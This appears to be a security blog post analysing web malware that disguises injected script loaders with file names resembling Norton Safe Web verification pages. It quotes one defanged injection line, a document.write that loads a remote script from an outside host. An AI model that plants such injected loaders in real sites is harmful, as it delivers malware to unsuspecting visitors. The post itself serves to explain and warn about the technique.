• Web-Malware Faking Norton

    The growth of web-based malware continues unabated. Malware developers are targeting websites to distribute malicious viruses, Trojans and other harmful computer programs. This modern modus operandi banks on the fact that most websites have weak security and can be easily compromised. In fact even the top 15 financial institutions have vulnerabilities. In this article, we describe another relatively new trick that malware developers are using to avoid detection of their malicious code.

    The Phenomenon
    Website compromise is a growing trend. More than 6,600 new websites get hacked every single day and consequently become distributors of malware and are blacklisted as a result. These websites lose business and customer trust, not to mention that these compromised websites can become part of the chain of information theft.

    Fake anti-virus advertisements have been around for a long time. Niels Provos of Google, posted a great article about this. Symantec (Norton) also published information on this trend. Malware authors are playing on the tendency of unsuspecting users to trust any software that says “Anti-Virus” or “Malware Scan” on it.

    Web-Malware Posing as Norton Anti-Virus
    This post does not simply discuss fake anti-virus posing as the real deal, but also the issue of web-malware with names similar to that of anti-virus software. We discuss the emerging trend of malware authors finding insecure websites to compromise using “code injection”. This mechanism involves injection of malicious computer code which is executed when the infected web page is viewed by the browser (Internet Explorer, Safari, Firefox, Opera, etc.) of the visitor to the website. The owner of the website is completely oblivious that such an attack has taken place. We present an example below of a piece of malicious code found on an unsuspecting website.

    document.write'< cript src=http://ftmlive.com/[scrubbed]/nortonsw_[scrubbed].php></ cript>

    This particular code was mined from a page on pinnaclevillas.com. The malware was found on ftmlive.com on 2010-11-06.

    This was just one of the many examples of malware we see on a daily basis pretending that it is a legitimate piece of software. In this case, the code is using a naming convention where the file which actually loads the attack payload includes “nortonsw” in its name in the hope that an administrator or user will assume it’s a Norton Anti-Virus related file.

    Interestingly, this naming convention is used by Norton’s Safe Web service where administrators must put up a page on their site with a name similar to “nortonsw_(unique code).html” for verification by Norton. It seems that malicious hackers are targeting the mechanism that Norton Safe Web uses to verify sites to cloak their malicious code. We have seen this use of familiar naming conventions to be on the rise.

    Till next time… when we post more interesting code samples and analysis.